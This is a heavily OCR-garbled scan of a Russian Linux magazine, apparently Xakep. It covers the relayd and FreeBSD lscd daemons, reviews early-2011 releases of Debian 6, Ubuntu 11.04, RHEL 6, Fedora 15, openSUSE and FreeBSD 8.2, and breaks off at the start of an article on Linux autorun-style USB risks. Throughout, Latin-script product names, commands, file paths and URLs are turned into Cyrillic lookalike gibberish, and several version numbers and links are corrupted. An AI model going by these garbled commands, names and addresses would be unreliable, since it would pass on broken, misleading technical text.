асііѵе асііѵе 
асііѵе ыаіііпд 



бу&Іод боскеі 

/йБѵУіпіісіІ СпіираііЫНІу Боскві 
І_оддіпд Баске! 

Оеізуеб БГіиІгіошп 5оскѳі 

/Яеѵ/гйа5 

Вавіе Зуйіет 

Епс гуріей Ѵоіитез 

О-Вие 

І_одт Ргатріз 

Іосѳі РПе Еузіетз 

№Ш~Цмг 

Неіыогк 

Йвгпйіе РПе Бузіетз 

Зоскеів 

Боипй Сагр 

5ыар 

Зузіет Іпіііаі ігэііоп 

Оаі Іу Сіеапир оі Тетрогагц Оігесіогіеа 



ЬОЯО = Ееіівсіз иІіеіНег Ііів ипіі сіеііпіііоп іінз ргорегіу ІоайесІ. 

ПСИ ѴЕ = ТЬе МдЬ-ІеѵеІ ипіі асііѵаііоп еіаіе, і .е. депегаі ігаііоп оі 511В, 
ЗОВ = Тпе Іои-Іеѵеі ипіі асііѵвіісп аіаіе, ѵаіиез йерепб оп ипіі Іуре. 
ЛОВ = Репйіпд ЛеЬ Гог ІЬе ипіі. 

76 ипіІ5 Наіесі. Равс — а И Іо аее іпасііѵе ипііс, Іоо. 



СЕНО» 



Результат работы команды зузіетсіі 



тосіе ІоасІЬаІапсе сііеск Іср 

} 

Наиболее важные части этого конфига находятся в теле дирек- 
тив сіпз ргоіосоі и геіау. Первая представляет собой нечто вроде 
шаблона, который используется для того, чтобы не повторять 
одни и те же настройки протоколов в других частях конфигу- 
рационного файла (геіаусі поддерживаеттри протокола: НИР, 
0ІМ5 и ТОР). Вторая — это настройка релея, в котором указаны 
прослушиваемый порт, проксируемый протокол, его настройки 
и информация отом, каким образом и какому хосту должны быть 
перенаправлены пакеты. В нашем случае прокси должен от- 
править 0145-запрос одному из трех серверов с предварительной 
проверкой на доступность (здесь используется проверка методом 
ТСР-рукопожатия, но геіаусі поддерживает множество других 
методов, начиная от ріпд и заканчивая попыткой установить 55 1_- 
соединение]. При этом, если один из 0145-серверов окажется в 
дауне, геіаусі автоматически исключит его из списка до тех пор, 
пока плановая проверка на доступность (интервал между про- 
верками указан в опции іпіегѵаі) не покажет его работоспособ- 
ность. 

Для тестирования конфигурации можно использовать следующую 
форму запуска геіаусі : 

# геіаусі -сі -ѵѵ --Р /еіс/геіаусі . соггР 

Так демон не уйдет в фон и будет вести подробную распечатку всех 
своих действий. После отладки конфигурации можно настроить 
запуск демона во время загрузки системы. Для этого достаточно 
поместить строку ге ІаусІ_і : Іа д5=»» в файл /еІс/гс.сопРІосаІ. 

РгееВЗІ І$ссІ: красота 
минимализма 

Этого раздела не должно было быть в статье. Демон ІзссІ настоль- 
ко простой инструмент, что писать о нем отдельно мне казалось 
излишним. С другой стороны, не писать о нем нельзя, потому как 
это один из ярчайших приме ров прав ильн о го решения задачи в 
стиле II N IX. А задача у разработчиков РгееВ50 была следующая. 



Различные системные инеочень демоны могут время от времени 
падать (или начинать вести себя как идиоты, что еще хуже). Ріа 
домашней машине это не страшно, упавшего можно перезапу- 
стить руками или отправить комп в перезагрузку. Ріо что делать на 
сервере, где админ бывает редко? 

Сервисы надо мониторить и перезапускать по мере необходимо- 
сти. Какэто сделать? Естественно, встроить эту функциональность 
в систему инициализации (ведь именно она занимается запуском 
демонов). И, например, в 5оІагізтак и сделано, да настолько экс- 
травагантно, что сам Л и нус Торвальдс ногу сломит, пока разберет- 
ся с его настройкой. 

Разработчики РгееВ50 поступили проще. Они написали отдель- 
ный демон, который способен работать со скриптами инициализа- 
ции РгееВВй, оставаясь совершенно независимой системой. Вся 
соль в том, что Ізсб получился настолько простым, что им можно 
пользоваться, не читая тап- страниц и не беспокоясь о том, что он 
можетупасть. Посуди сам, чтобы заставить Ізсб следить за, напри- 
мер, ззЬсІ, нужно ввести всего одну команду: 

# -Рзсасіт епаЫе ббіісі /ѵаг/гип/ББІісІ . ріеі 

Все, Ізсб запомнит этот выбор и автоматически включит мони- 
торинг после перезагрузки машины. Единственное условие: у 
подконтрольного демона должен быть инициализационный файл 
в каталоге /еіс/гс.сі (или /изг/іоса і/еіс/гс. сі ) и запись в файле /еіе/ 
гс.сопр включающая его (это очевидно). 

Демон ІзссІ будет доступен только во РгееВВй 9.0, но е го впол- 
не можно скачать с официальной странички (реорІе.ітееЬзсІ. 
огдМгбосІезЛзс) и собрать для восьмерки. 

Выводы 

Каждый день в мире II N IX появляется что-то новое, но очень редко 
это новое оказывается чем-то стоящим нашего внимания. 

В этой статье я рассказал о четырех системных компонентах 
1Э N IX, которые не только заслуживают особого внимания, но и 
несут реальную пользу. Кто знает, возможно в будущем они будут 
такой же неотъемлемой частью II N IX, как команда дгер или демон 
зузіод. т 
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пингвинов 

ПО ВЕСНЕ СЧИТАЮТ 

Обзор самых громких релизов начала года 



• Так повелось, что релизы основных дистрибутивов выходят либо 
весной, либо осенью. В этом году интересных релизов было особенно 
много. По ним можно судить, что ожидает мир ОрепЗоигсе 
в ближайшие год-два. 



Старый друг лучше новых двух 

Пожалуй, самое громкое событие начала года — релиз ОеЬіап 6 (ко- 
довое имя — Зциееге). Событие долгожданное — с момента прошлого 
релиза прошло около двух лет. Каки прежде, ОеЬіап поддерживает 
целый ворох архитектур: отобычныхх86 и х86-64, набирающих 
все большую популярность АРМ (агтеі) и теряющих популярность 
роѵѵегрс до совсем экзотичных іа64 (Іпіеі Ііапіит), зрагс (Огасіе 
8РАРС], тірз и з390 (ІВМ 5/390). Прекращена поддержка архитектур 
аірба и Ьрра (НР РА-РІ5С). Одно из основных нововведений сточки 
зрения поддерживаемых архитектур — появление версии на ядре 



РгееВЗО: ОеЬіап 6І\ІІІ/кРгееВ50 (кГгееЬзсІ-і386 и кбгееЬзсІ-а тсі 64) . 
Используется ядро предыдущего стабильного релиза РгееВЗО 8.1 . 
Получился достаточно интересный микс двух систем: ОС с одновре- 
менной поддержкой арі-деі, Ір1\л/(или рО и іаіі, 

С новым релизом «малыш» ОеЬіап опять подрос — теперь его репози- 
торий содержитболее 29 000 пакетов (около 1 5 000 программ). Вся эта 
радостьзанимает8 ОѴО или 52 СО. Крометого, наконец-то появились 
официальные ЫѵеСО (для х86 и х86-64). Эти Ыѵе-образы (авторы 
называющих гибридными) имеют одну приятную особенность — их 
можно без особых плясок с бубном записать на флешку, прямо воттак: 
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Думаешь, это ОеЬіап Ііпих? Ан нет — ОеЬіап 
6ЫІІ/кРгееВ$0 :) 



КіІ'ы современного 
днстростроения 



Соп5о1еКИ; — сервис, отвечающий за управление 
сессиями пользователей. Он необходим для корректной 
параллельной работы графических окружений 
нескольких пользователей. Еще одна полезная 
возможность СопзоІеКіі — определять, является ли 
пользователь локальным. Кратко работу СопзоІеКіІ: 
можно описать следующим образом. 

Нумеруются все текущие 5еаІ — физические 
устройства для ввода/вывода информации на 
данном компе (как правило, у компа один Зеаі: — 
локальные монитор+клавиатура+мышь]. Пользователь 
логинится с помощью Іодіп тападег, который создает 
пользовательскую сессию, привязанную к текущему 
5еаЕ Для всех процессов, запущенных в текущей сессии, 
присваивается специальная переменная — $Х06_5Е5- 
5І0І\І_С00КІЕ. С помощью этой переменной СопзоІеКіІ: 
и определяет соответствие процессов определенной 
сессии. 

Посмотреть список текущих сессий можно так: 

$ Ск-1І5І:-5е55ІОП5 

РоІісуКИ: представляет собой специальную 
инфраструктуру для приложений, которая выступает в 
качестве посредника между непривилегированными 
пользователями и привилегированным системным 
контекстом. При обращении процесса из 
пользовательской сессии к сервису, сервис проверяет 
пользовательские привилегии через РоІісуКіЕ В 
зависимости от настроек ответ может быть «можно», 
«нельзя», «введи свой пароль» или «введи пароль 
гооЕа». Основное отличие РоІісуКИ: от гисіо (который, 
казалось бы, выполняет те же задачи] в том, что 
привилегии предоставляются не на процесс целиком, 
а на конкретные действия. Список действий, к которым 
можно предоставить доступ, можно посмотреть так: 

$ ркасбіоп 

Работа СопзоІеКіІ: и РоІісуКИ: сильно завязана на 0-Виз. 
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Образы подготовлены с помощью небольшой утилитки 
под названием Ііѵе-Ьиііб, которую можно использовать 
для создания своих кастомных ЕіѵеСО/ЕіѵеІІВВ. 

Отличие нового релиза от предыдущего (с кодовым 
именем І_еппу) заметны уже на стадии установки: 

1. Инсталлятортеперь подозреваете существовании ФС 




ехі4 (однако при автоматической разметке поумолчанию 
все же используется ехіЗ) и 2Р5 (только для ОеЬіап 6 N11/ 
кЕгееВЕЮ), поддержка геізеііз поумолчанию выключена (но 
может быть включена путем выбора рагітап-геізегі'з в на- 
стройках опциональной установки в экспертном режиме]. 

2 . Все рекомендованные пакеты теперьустанавливаются 
поумолчанию. 

3. При выборе наборов ПО для установки появился пункт 
для установки 55Н-сервера. Одной командой после 
установки меньше :] 

4 . В процессе установки инсталляторутеперь можно 
подсунуть дополнительные пакеты сбгтѵѵаге. Ктомуже 
инсталлятор сам устанавливаетспецифичные пакеты 
для определенного оборудования, которое емуудалось 
обнаружить. 

5 . При установке загрузчика (который обновлен до 6НІІВ2) 
теперь обнаруживаются современные версии ѴѴіпсІоѵѵз. 
После установки заметны следующиеулучшения: 

1. Уменьшено время загрузки. В основном благодаря 
новой системе инициализации іпззегѵ, реализующей 
параллельный запусксервисов (сучетом зависимостей). 

2 . Внедрениетехнологии КМ5 (Кегпеі Мобе ЗеШпд — 
переключение видеорежимов на уровне ядра) с под- 
держкой распространенных графических чипов Іпіеі, 
АМй, Ыѵібіа. КМ5 обеспечивает более быстрое и плавное 
переключение между виртуальными консолями, а также 
более стабильные зизрепб/гезиппе. 

3. Комбинация <СігІ+Аи+Васкзрасе>, убивающая иксы, 
поумолчанию отключена. 

4 . Улучшена поддержка ІРѵб, теперь его поддерживают 
практически все сетевые приложения. В связи с оконча- 
нием пула свободных адресов I Рѵ4 — весьма актуально. 



Новый хамелеон 



В марте вышла новая версия орепЗІІЗЕ — 1 1 .4. Основные нововведения: 

• ускорены операции по установке/обновлению пакетов и обновлению списка 
пакетов благодаря новой версии библиотеки ІіЬгурр, которая умеет закачивать 
только измененные части файлов, причем параллельно с нескольких серверов; 

• внедрен зузФтб (но пока поумолчанию не используется); 

• ОрепОібісе уступил место ЬіЬгеОіІісе; 

• ѴѴеЬѴаЗТ — ѵѵеЬ-интерфейс для удаленного администрирования; 

• из системы полностью удален НАЬ (Нагбѵѵаге АЬзФасбоп Еауег] как устаревший; 

• Ьіпих-ядро 2.6.37; 

• новые версии РЕ: Споте 2.32.2 (кактолько зарелизится СпотеЗ, он придет как 
обычное обновление], КОЕ 4.6, Х!се 4.8; 

• новые версии системного ПО: ХОгд 7.6, Меза 7.9, РуіЬоп 2.7, 01 4.7; 

• новые версии пользовательского ПО: Еіге1ш4, ѴіііиаІВох 4. 




НТТР://ѴѴѴШ 



■ г 

> Ііпкз 

• ОеЬіап ЬіѵеСО: 
Ііѵе.беЬіап.пеЦ 

• официальная дока 
по СопзоІеКіІ: 
доо.дРбиКхЫ ; 

• официальная дока 
по РоІісуКИ: : 
ЬаЦгеебезкіор.огд/ 
босз/роікік 
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ІІЫІХОЮ 




Панель слева — ІІпНу ЬаипсЬег 



Птица Феникс 



В начале лета должен выйти релиз чуть было не почившего 
дистрибутива — Мапбгіѵа-201 1 . С недавних пор релизы стали 
выходить раз в год. 

Основные нововведения: 

• переход на РРМ5 (который развивается независимо от РесІНаі); 

• интеграция зузіетсі; 

• переработанный пользовательский интерфейс, появление 
специального интерфейса для нетбуков; 

• новое приложение для управления пакетами; 

• новый режим работы инсталлятора сводит всю установку к 
нескольким шагам, а для тех, кто хочет изменить настройки по 
умолчанию, есть экспертный режим; 

• Біпих-ядро 2.6.37; 

• новые версии ОБ: КОЕ 4.6 — БЕ по умолчанию, Споте 2.32, Хісе 4.8; 

• новые версии системного ПО: ХОгд 7.5, 6СС 4.5; 

• новые версии пользовательского ПО: Рігебох 4, орепоІГісе 3.3. 



5 . Постепенно из системы выпиливают поддержку 055 какуста- 
ревшей. Для тех, кому она еще нужна, пока осталась возможность 
включитьее опционально. 

6. Настройки клавиатуры для консоли и для иксовтеперь идентичны и 
хранятся в файле /еЕс/сІеЕаиІі/кеуЬоагсІ. 

7 . Обновленные версии йЕ: КОЕ 50 4.4.5, ОЫ ОМЕ 2.30 (с бэкпортиро- 
ванием некоторых фишек из 2.32), Хісе 4.6, БХОЕ 0.5.0. 

8. Новые версии пользовательского ПО: ОрепОІІісе.огд 3.2.1 , 

Ісеѵѵеазеі (Рігебох) 3.5.1 6. 

Не меньшее количество различных изменений находится «под 
капотом» и незаметно с первого взгляда: 

1. Біпих 2.6.32 с поддержкой Хеп 4.0.1 (ботО и ботіі). 

2 . Новые версии системного ПО: ОСС 4.4.5, Х.Огд 7.5. 

3. Новые версии серверного ПО: 0реп55Н 5.5р1 , АрасЬе 2.2.1 6, Му50Б 
5.1 .49, РозІдге50Б8.4.6, 5атЬа 3.5.6. 

4 . Новые версии интерпретаторов: РуіЬоп 2.6.6 (3.1 .3 также доступен), 
Регі 5.1 0.1 , РНР 5.3.3, НиЬу 1 .9.1 . 

5 . ПереходсдІіЬс на едіібс (ЕтЬеббеб О Ы ВС, разрабатываласьспе- 
циально для встраиваемых систем), которая менеетребовательна к 
железу и более гибкая, и при этом полностью совместима с діібс. 

6. Улучшена поддержка аутентификации пользователей в ЮАР (бла- 
годаря ІіЬпзз-ШарсІ, ІіЬрат-Шарб и локальному демону пзіссі). 

7 . Пакеты с исходниками теперь распространяются в новом формате 
0еЬ5гс 3.0, основное отличие которого от предыдущей версии — 
возможность размещать патчи в нескольких файлах (необязательно 
складывать все в один). 

8. Ускорена работа бркд. Он теперь поддерживает формат сжатия XX 
(использующий алгоритм Б2МА2). Убрана зависимость бркд от регі. 

9 . В дистрибутив интегрированы СопзоІеКіІ и РоІісуКіІ (см. врезку 
«Кіі’ы современного дистростроен ия»), 

10 . Поддержка технологии 0Ы55ЕС (защищающей клиентов от 





На мой взгляд, один из лучших дистров с КОЕ 



фальшивых 01\15-данных) во входящем в дистрибутив 01\15-сервере 
В I N 09. Интеграция пакета 0реп0Ы55ЕС упрощает процесс создания 
01\155ЕС-записей для зон. 

В инфраструктуре проекта ОеЬіап тоже произошли кое-какие из- 
менения: 

1. ОеЬіап Васкрогіз (сервис по предоставлению новых версий ПО 
для стабильной ветки дистрибутива) приобрел официальный статус и 
теперь находится по адресу ЬаскрогІг.беЬіап.огд . 

2 . Одновременно с выходом ОеЬіап Вциееге был обновлен офици- 
альный сайт ОеЬіап .ого . дизайн которого не менялся вотуже 13 (!) лет. 
Редизайн коснулся также и поддоменов: раскадез.ОеЬіап.огд . ѵѵікі. 
ОеЬіап.огд и другие. Посмотреть, каквыглядел сайт раньше, можно, 
например, здесь: герІау.ѵѵауЬасктасЬіпе.огд/201 008301 60456/ЫірУ/ 
уууууу.беЫап.огд . 

Для ОеЬіап изменения буквально революционные. Но радует тот факт, 
что он остается верен принципам абсолютной свободы. Даже ядро в 
новом релизе без всяких блобов — они вынесены в отдельные пакеты 
и теперь обитают в репозитории «поп-ігее». 

Революционер 

В отличии от ОеЬіап, релизы ІІЬипІи выходят строго раз в полгода 

— поэтому их даже как-то не особо и ждешь. Следующий релизза 
номером 1 1 .04 (и кодовым именем ІМаІІу ІМагѵѵЬаІ) должен выйти 28 
апреля. Если предыдущие релизы 1 0.04 и 10.1 0 сходу друг от друга и 
не отличишь, то нововведения свежего релиза сразуже бросаются 
в глаза. Основное отличие — использование графической оболочки 
Ііпііув версии для десктопов (раньшеона использоваласьтолько в 
версии для нетбуков). Главную идею Ііпііу можно сформулировать как- 
то так: современные широкоформатные дисплеи больше шире, чем 
выше. Поэтому вертикальное пространство ценнее, и его надо беречь. 
Бережетэто пространство Ііпііу с помощью отказа от нижней панели и 
технологии СІоЬаІМепи, позволяющей выносить меню приложений на 
верхнюю панель. Естественно, поддержи в а ют эту технологию не все 
приложения, а только те, которые о ней «знают». На данный момент 
этотсписокне очень большой, но включает в себя практически все 
приложения, устанавливаемые по умолчанию. Запуск и переключе- 
ние между запущенными приложениями происходятс помощью спе- 
циальной автоматически скрываемой панельки в левой части экрана 

— Ііпііу БаипсЬег. Вызвать ее можно, наведя мышку на левый верхний 
угол монитора, либо похоткею: поумолчанию — ѴѴіп (онаже — 5ирег). 
Еще один важный элемент Біпііу — это ОазЬ, вызывается нажатием на 
логотип БІЬипІи в верхнем левом углу. Если кратко, то ОазЬ —специ- 
альная панелька для поиска/запуска приложений, поиска/открытия 
документов, быстрого запуска браузера, медиаплеера и так далее. 

В общем, лучше один раз увидеть Біпііу, чем сто раз услышать. Благо, 
для того чтобы попробовать, требуется совсем немного — видеокар- 
та/видеодрайвера, которые потянут Сот ріг. Помимо Сотріг, Біпііу 
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Рейтинги в новом ЗоАѵѵаге Сепіег 



Новые вычисления 



Вышла новая версия основанного на депіоо дистрибутива Саі- 
сиіаіе Упих 1 1 .0. Хотя дистрибутив разрабатывается нашими 
соотечественниками, в России он не очень известен. 

Основные изменения: 

• появилась новая сборка — СаІсиІаФ ЗсгаФЬ Зегѵег; 

• добавлены бинарные репозитории для Саісиіаіе Ыпих Резкіор и 
Саісиіаіе Оігесіогу Зегѵег с поддержкой гоіііпд-геіеазе; 

• для скачивания стали доступны еженедельные сборки 
Дистрибутивов; 

• улучшен интерфейс пользователя в Саісиіаіе Ыпих Резкіор; 

• переход на РоОаде 2.2; 

• улучшена поддержка нетбуков и принтеров Сапоп; 

• использование КМЗдля видеокарт Іпіеі. 

использует графическую библиотеку Сіиііег (активно использующую 
ОрепѲІ_для рендеринга) и Хеіідеізі (механизм для организации 
работы сданными на основе метаданных — таких каквремя создания/ 
модификации и метки). 

Я честно пытался пользоваться II пііу довольно продолжительное 
время — имхо, отличный интерфейс... для каких-нибудь планшетов. 

На ноуте с 1 5,6" — старый добрый ламповый гном 2.x для меня куда 
удобнее. Хотя в целом инициатива достаточно интересная, и ей уже 
заинтересовались разработчики других дистрибутивов. Правда, 
начавшаяся было деятельность по портированию Ііпііу на Еебога и 
ОрепЗІІЗЕ быстро сошла на нет. Проблема в большом количестве 
патчей на СотрУ, 0-Виз и прочего, необходимого для работы Ііпііу. 
Когда эти патчи войдут в апстрим, перенести Ііпііу на другие дистри- 
бутивы станетзначительно проще. 

Если кому-то Ііпііу не нравится, можно в дбт выбрать пункт«ІІЬип1:и 
С1аззіс»с классическим Опоте (также никто не мешает самостоя- 
тельно установить Ѳпоте ЗЬеЩ. 

ІІпііу — основное, но не единственное изменение, есть еще несколь- 
ко довольно весомых: 

1. Отныне редакция для нетбуков будеттолько для архитектуры агтеі 
(платформы ОМАРЗ и ОМАР4). Для х86 предлагается использовать 
обычную десктопную версию. Вообще, поддержке АРМ в новом рели- 
зе уделено большое внимание. Сапопісаі рвется на планшеты :) 

2 . Аудиоплеер поумолчаниютеперь ВапзЬее. Не совсем понятный 
шаг.таккакон написан на топо, а оттопо вроде какпытались из- 
бавляться. Интересная история вышла и с магазином музыки. Дело 
в том, что у ВапзЬее есть свой магазин, все доходы от которого пере- 
числяются ОІМОМЕ Еоипбаііоп. И у Сапопісаі тоже есть свой магазин, 
все доходы от которого перечисляются Сапопісаі :). В конце концов 
остановились на варианте, что теперь в ВапзЬее для ІІЬипІи будетдва 
магазина, 25% дохода от которых перечисляется 6ІЧ0МЕ Еоипбаііоп. 

3. ЫЬгеОІІісе 3.3 заменил собой ОрепОІІісе. 




Новый сайт ІЭеЬіап 

4 . В Зоііѵѵаге Сепіегдобавлены рейтинги и обзоры ПО. 

5 . ІІЬипІи Опе обзавелся новым интерфейсом и научился синхронизи- 
ровать фотографии через ЗЬоІѵѵеІІ. 

6 . Сам ЗЬоІѵѵеІІ обновился до 0.8 и получил поддержку видео (с воз- 
можностью импорта с камер или мобильников, аплоада на ѴоиТиЬе, 
Еііскг, ЕасеЬоок, РісазаѴѴеЬ и Яндекс. Фотки). 

7 . Ыпих 2.6.38. 

8. Новые версии системного ПО: ѲСС 4.5, Х.Огд 7.6. 

9 . Новые версии РЕ: КО Е 4.6, Споте 3, Хбсе 4.8, 1_ХОЕ0.5.0. 

10 . И, наконец, для тех отчаянных парней, кому перечисленных ново- 
введений мало — в репозитории появился новый графический сервер 
ѴѴауІапб. 

Красные 

В стане РРМ-Ьазеб дистрибутивов тоже праздник— в конце прошлого 
года вышел Реб Наі Епіегргізе Ыпих 6, который будет поддерживаться 
до 2020 года. 

Ключевые изменения: 

1. Ыпих 2.6.32 с некоторыми фишками, бэкпортированными из более 
новых версий. Это ядро будет поддерживаться в течение всего 
времени жизни РНЕІ_6, поддержку нового оборудования планируется 
добавлять. При этом АВІ -интерфейс не изменится. По умолчанию 
теперь используется более производительный планировщикзадач 
СЕВ (Сотріеіе ЕаігЗсЬебиІег). Вообще, в новом релизе производи- 
тельности уделено особое внимание (в первую очередь на многопро- 
цессорных/многоядерных системах). Маркетологи хвастаются, что 
новая версия быстрее предыдущей в 2-5 раз. 

2 . Традиционный ЗуЗѴіпіІ заменен на ирзіагі. 

3. В качестве системы виртуализации используется КѴМ, которая 
в новой версии должна быть быстрее и стабильнее. Поддержка 
Хеп РотО убрана, осталасьтолько поддержка Хеп РотІІ (работа в 
качестве гостя). Зато добавлена поддержка протокола 5РІСЕ (Вітріе 
Ргоіосоііог Іпберепбепі Сотриііпд Епѵігоптепіз), позволяющего 
удаленно работать с виртуальной машиной в графическом режиме. 
Основное отличие 5РІСЕ отѴІМС (Ѵігіиаі Ыеіѵѵогк Сотриііпд) или РРР 
(Місгозоіі Ретоіе йевкіор Ргоіосоі) — обработка аудио-и видеопото- 
ков, а также рендерингсодержимого экрана происходит на стороне 
клиента. Это позволяет, например, смотреть видео на виртуальной 
машине без лишней нагрузки на хост; 

4 . Появилась возможность горячего добавления ОЗУ и устройств в 
шину РСІ Ехргезз. 

б.Теперьфайловая система поумолчанию — ехі4. Также добавлена 
поддержка ХЕ5, ЫЕ5ѵ4 и конечноже экспериментальная поддержка 
В*ІІ5. 

6 . Новая служба Эузіет Эесигііу Эегѵісез йаетоп (5530) представ- 
ляет из себя что-то вроде прослойки для аутентификации пользова- 
телей. В качестве бэкэнда могут выступать ЮАР, КегЬегоз и другие. 
Приятная возможность: кэширование авторизации ЫШпе тобе). 

7 . И, наконец, новый релиз более «зеленый», чем предыдущий — это 
сейчас модно. Уменьшение энергопотребления достигается за счет 
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оптимизации ядра, котороетеперь чаще переводит процессор в 
режим с пониженным энергопотреблением. 

8 . Новые версии системного ПО: ОСС 4.4, Х.Огд 7.5. 

9 . Новые версии ОБ: К0Е4.3.4, бпоте 2.28.6. 

10 . Н овые версии серверного ПО: АрасЬе 2.2.1 5, Му50Е5.1 .47, 
РозІдгеЗОЕ 8.4.4, 5атЬа 3.5.4. 

11 . Новые версии интерпретаторов: РНР 5.3.2, Руібоп 2.6.5. 

РНЕБ имеет довольно большое количество разнообразных клонов. 
Самый известный из них — СепЮВ. Точная дата выхода СепЮВ 6 пока 
не известна, но уже «вот-вот». Возможно, к выходу журнала в печать 
релиз уже созреет. Зато менее известный 055-клон зарелизился еще 
в начале марта — Зсіепіібс Біпих 6 (зсіепббсііпих.огд). Как понятно из 
названия —линукс дляученых. Разрабатывается силами СЕРЫ (Ев- 
ропейская организация по ядерным исследованиям —те, кто сделали 
Большой адронный коллайдер] и других лабораторий. 

Отличия отРНЕЕб: 

• оконный менеджер ІсеѴѴМ; 

• ОрепАБЗ — открытая распределенная ФС; 

• утилиты геѵізог, ІіѵессМооІз и ІіѵеизЬ-сгеаІог для создания персона- 
лизированных ЕіѵеСВ/ЕіѵеБІЗВ; 

• уит-аиіоирсіаіе — механизм автоматическихобновлений. 

Большое количество различных научных программ, ранее доступных в 
репозитории Зсіепіібс Біпих, теперь перенесены во внешние репозито- 
рии. Корпорация Огасіе также представила новую версиюсвоего дис- 
трибутива, основанного на РНЕБ 6, это Огасіе Біпих 6. Отличий от ори- 
гинального РНЕБнетакужи много. Одно из основных — БІпЬгеакаЫе 
Епіегргізе Кегпеі (существующее только в 64-битном варианте], которое 
«быстрее, выше, сильнее» и вообще единственно верный способ за- 
пуска других продуктов Огасіе, таких как малоизвестная СУБД :). 



Другое известное детище ВесІНа* — Ресіога. Сейчас работа над но- 
вым релизом кипитвовсю — в мае должна выйти версия 1 5 (Боѵеіоск). 
Из планов на Еебога 1 5 можно выделить следующие: 

1. Использование поумолчанию системного менеджера Бузіетсі 
(читай о нем в статье «Демоническая сила» в этом же номере). 

2 . Использование сжатия ЕХМАдля БіѵеСБ. 

3. Раздел ы/ѵаг/гип и /ѵаг/іоск будут смонтированы в виде РАМ-диска 
(іпгірЫ. 

4 . Полная поддержка В^гбз в инсталляторе. 

5 . Вместо зиіб-бита будет использован механизм ядра сараЬіІіІіез. 

6 . Замена ОрепОШсе.огд на БІЬгеОШсе. 

7 . Обновление пакетного менеджера РРМ до версии 4.9. 

8. Поддержка технологии 5рісе в ѵігі-тападег. 

9 . Поддержка загрузки с новыхдисков с размером сектора 4 Кб. 

10 . Возможность управления правилами файервола через Б-Виз, без 
необходимости рестарта. 

11. Поумолчанию для 0Ы5-клиентов используется ВЫ55ЕС. 

12 . Самая спорная новая фича:теперьсетевые интерфейсы будут 
именоваться в зависимости оттипа подключения карты: 

• етірогі} — встроенная в матплату карточка; 

• рсі{зІоі}#{рогі} — РСІ-карточки. Для ѴБАІЧ'ов и аііаз’ов будут исполь- 
зоваться специальные суффиксы: .{ѵіап} и Заііаз}. 

13. Новые версии системного ПО: ОСС 4.6, Х.Огд 7.6. 

14 . Новые версии БЕ: КОЕ 4.6, Опоте 3.0, Хіюе 4.8. 

Демоны весны 

Весной нетолько линуксы релизятся, но и демоны пробуждаются от 
зимней спячки. В конце зимы (спустя семь месяцев от релиза 8.1 ) 
вышли ЕгееВЗО 8.2 и 7.4. Релиз 7.4 не принес чего-то кардинально 
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новогоітолько латание дырок, фиксы багов и поддержка нового обо- 
рудования (в основном гигабитных сетевых карточек: Абаегоз АР81 51/ 
АР8152, Вгоабсот ВСМ5718, 5І5190/191 и других). Обновления для 
седьмой ветки будут выходить еще два года. 

РгееВЗй 8.2 куда интереснее: 

1. Реализация 2Е8 обновлена до 1 5 версии, из ОрепЗоІагіз перене- 
сены патчи, увеличивающие производительность и стабильность 2Е5. 

2. Криптографическая подсистема деіітеперьумеет работать сразу с 
несколькими ключами, используя каждый из них для своего набора 
секторов на диске. По умолчаниютеперь используется режим АЕ5-ХТ5, 
а сама утилита деіі научилась изменять разделы шифрованных ФС. 

3. Добавлен новый пеід гарб-узел, позволяющий изменять произ- 
вольные поля в заголовках пакетов. 

4. Появился новый драйвер, поддерживающий 115В 3.0 (хіісі). 

5. Появилась поддержка аппаратныхакселераторов шифрования в 
новых СРІІ Іпіеі. 

6 . Добавлена поддержка новых проводных (Абаегоз АР81 51/АР81 52 
РСІе ОідаЬіі/РазІ Ебаегпеі, ІпІеИООЬ ЕТЬегпеІ: 82599 и Вгоабсот 
ВСМ5718) и беспроводных (I піеі ѴѴігеІезз ѴѴіЕІ Ыпк 6000, Вгоабсот 
ВСМ430* и ВСМ431 *) сетевых карт. 

7 . В йТгасе появилась возможность динамическойтрассировки поль- 
зовательских приложений, а нетолько процессов в ядре. 

8. В утилиту Іаг добавлена поддержка І_2МА. 

9 . Устранены проблемы в работе ЕгееВЗй х86-64 в качестве гостевой 
системы Хеп в режиме НѴМ. 



10. В рхеЬооІ по умолчанию отныне используется ЫЕЗѵЗ (вместо 
ЫЕ5ѵ2). 

1 1. Теперь инсталлятор поумолчанию использует следующие разме- 
ры разделов: 1 Гб для корневого раздела, 4 Гб для/ѵаги 1 Гб дляДіапр. 

12. ОЫ ОМЕ 2.32.1 , КйЕ 4.5.5. 

Тенденции 

Из всех этих сбапдеіод’ов можно выделить несколько общихтен- 
денций: 

1. Достаточно много внимания стало уделяться времени загрузки ОС, 
практически все дистрибутивы уже внедрили какой-нибудь систем- 
ный менеджер, поддерживающий параллельную загрузку (например, 
ирзіагі или зузіетб). 

2 . Параллельно с внедрением новыхтехнологий идетпроцесс избав- 
ления от старых, вроде НАГ. 

3. Все большее количество сервисов завязано на й-Виз (см. статью 
«Хозяин цифровой магистрали» в сентябрьском номере ] [ за 2010 год, 

хакер.ги/розі/54722/бе1 : аии.а5р ). 

4 . Многие разработчики дистрибутивов при выборе офисного 
пакета остановили свой выбор на ЫЬгеОбасе. Думаю, ОеЬіапсего 
политикой максимальной свободы тоже перейдет на него к следую- 
щему релизу. 

5 . Самая распространенная ФС для новыхдистрибутивов — ехі4. 
Через год-два ее, скорее всего, сменит ЬМз. 

6. Возможно, в недалеком будущем ѴѴау Іа п б займет место ХОгд. ~м~ 
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ПОГОННОЕ 

НАСЛЕДИЕ ѴМШ5 




• Всем известна истерия виндузятников по поводу флешек 
с вирусами. Линуксоиды же смотрят на все это с ухмылкой 
и чувством полного иммунитета. Но как выяснилось, рано 
расслаблять булки: и в линуксах существует не меньше косяков 
по этому поводу. 



АиТогип.іпТ мертв, да здравствует 
.аитошп! 

Полагаю, все в курсе, что в системах ѴѴіпсІоѵѵз существует возможность 
автоматически запускать программы после втыкания изЬ-флешки и 
прочих внешних накопителей. За эту функциональность ответственен 
файл аиіогип.іпб с помощью которого юные вирусописатели наломали 
немало дров, прежде чем мелкомягкие отключили автоматический 
запуск. Теперь, начиная с ѴѴіпсіоѵѵб 7, этот функционал отключен поумол- 
чанию. Но хитрые хакеры неунывали и находили новые способы натяги- 
вать пользователей. Об этом свидетельствуют нашумевшие уязвимости 



при обработке ярлыков (эту брешь эксплуатировал червь Зіихпеі) и раз- 
нообразных библиотексоздания эскизов, которые вступают в действие 
при простом просмотре содержимого флешки в «Проводнике». Было бы 
наивно предполагать, что в Линуксе подобной функциональности нет. 
Спецификации Ітеесіезкіюр.оп , которым еле дуют та кие окружения 
